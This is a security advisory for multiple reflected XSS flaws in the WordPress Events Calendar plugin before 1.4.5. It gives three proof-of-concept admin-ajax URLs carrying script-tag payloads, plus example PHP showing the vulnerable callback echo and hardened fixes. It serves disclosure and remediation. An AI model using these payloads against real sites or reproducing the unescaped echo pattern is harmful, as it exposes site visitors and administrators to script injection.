WordPress Plugin Vulnerabilities
WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS
Description
The plugin does not sanitize or escape several request parameters (`by_id`, `id` and `callback` in the proof of concept) before echoing them back into the admin-ajax response, leading to Reflected Cross-Site Scripting. Because the handler is reachable without logging in, the issue can be used against both unauthenticated and authenticated users, including high-privilege ones such as administrators.
Proof of Concept
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist).
2. Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

   1. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>
   2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>
   3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>

The payload is delivered by GET to admin-ajax.php, so no nonce, referer or login is needed to trigger it; the target simply has to open the link (or have it loaded from another page). A response whose body contains the `<script>` tag verbatim, served with a `text/html` content type, confirms the reflection.
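The description and the proof of concept above both point at the same root cause: an admin-ajax handler that writes request parameters into the response without escaping. The following PHP is an added illustration written for this page, not the plugin's actual code; the function names, the `cdaily` hook wiring, the `$_GET` keys and the returned data are assumed. It shows a JSONP-style `callback` echo of the kind that the third PoC URL targets, next to a hardened version, and the same fix applied to a parameter that lands inside HTML (the `id` of the second PoC URL).

```php
<?php
// Added example: hypothetical reconstruction of the vulnerable pattern and its fix.
// Handler names, hook names, $_GET keys and the $data payload are assumptions.

// Vulnerable: a JSONP-style endpoint that writes the caller-controlled "callback"
// parameter straight into the response body. admin-ajax.php does not set a
// Content-Type for you, so the browser renders this as text/html and runs the script.
function cd_dismisshint_vulnerable() {
    $callback = isset( $_GET['callback'] ) ? $_GET['callback'] : '';
    $data     = array( 'dismissed' => true );
    // ?callback=<script>alert(`xss`)</script> is reflected exactly as received.
    echo $callback . '(' . json_encode( $data ) . ');';
    wp_die();
}

// Hardened: allow-list the callback name, declare the content type so the response
// is never interpreted as HTML, and fall back to plain JSON when no callback is given.
function cd_dismisshint_hardened() {
    $callback = isset( $_GET['callback'] ) ? wp_unslash( $_GET['callback'] ) : '';
    $data     = array( 'dismissed' => true );

    if ( '' === $callback ) {
        wp_send_json( $data ); // sends application/json and exits
    }

    // Only a JavaScript identifier path such as "jQuery.cb123" is accepted;
    // anything containing <, >, quotes, spaces or parentheses is rejected.
    if ( ! preg_match( '/^[A-Za-z_$][A-Za-z0-9_$.]*$/', $callback ) ) {
        wp_send_json_error( array( 'message' => 'invalid callback' ), 400 );
    }

    header( 'Content-Type: application/javascript; charset=utf-8' );
    header( 'X-Content-Type-Options: nosniff' );
    echo '/**/' . $callback . '(' . wp_json_encode( $data ) . ');';
    wp_die();
}

// Same principle for a parameter that ends up inside HTML: coerce it to the type
// it is supposed to be, then escape for the exact output context (attribute here).
function cd_calendar_hardened() {
    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0; // numeric ID, never raw text
    printf( '<div class="cd-calendar" data-id="%s"></div>', esc_attr( $id ) );
    wp_die();
}

// Registering the action on both hooks is what makes the endpoint reachable without
// a session, which is why the PoC works against unauthenticated visitors. The fix is
// escaping at output time; removing the nopriv hook alone would not protect logged-in
// administrators who open a crafted link.
add_action( 'wp_ajax_cdaily',        'cd_dismisshint_hardened' );
add_action( 'wp_ajax_nopriv_cdaily', 'cd_dismisshint_hardened' );
```

When reviewing a fix for this class of bug, check that every value read from `$_GET`/`$_POST` is either cast to the expected type (`absint`, `intval`) or escaped with the helper matching its output context (`esc_html`, `esc_attr`, `esc_js`, `esc_url`), and that JSON or JSONP responses set an explicit non-HTML content type; sanitizing on input alone does not close a reflected XSS if the output path still concatenates strings.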
Classification
Type
XSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Verified
Yes
Timeline
Publicly Published
2022-12-20
Added
2022-12-20
Last Updated
2022-12-20